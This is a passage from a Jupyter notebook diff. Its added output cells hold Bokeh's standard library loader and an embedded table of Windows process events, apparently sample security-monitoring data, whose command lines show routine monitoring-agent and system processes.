== null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"b150951c-1d9c-43d4-b23b-0e0baa1e8441\" data-root-id=\"1271\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"dd9cf645-1572-400f-9714-dd67b652feb7\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1273\"},{\"id\":\"1274\"},{\"id\":\"1280\"},{\"id\":\"1275\"},{\"id\":\"1276\"},{\"id\":\"1277\"},{\"id\":\"1278\"}],\"editable\":true,\"height\":550,\"source\":{\"id\":\"1249\"},\"view\":{\"id\":\"1270\"},\"width_policy\":\"max\"},\"id\":\"1271\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1321\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1322\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1330\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1324\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1322\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1321\"},\"title\":\"Account\",\"width\":26},\"id\":\"1273\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1320\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1327\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1325\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1324\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1323\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1274\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1326\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1333\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1329\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1333\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1332\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1278\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1328\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1327\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1326\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1275\",\"type\":\"TableColumn\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1279\",\"type\":\"DateFormatter\"},{\"attributes\":{},\"id\":\"1331\",\"type\":\"StringEditor\"},{\"attributes\":{\"source\":{\"id\":\"1249\"}},\"id\":\"1270\",\"type\":\"CDSView\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo 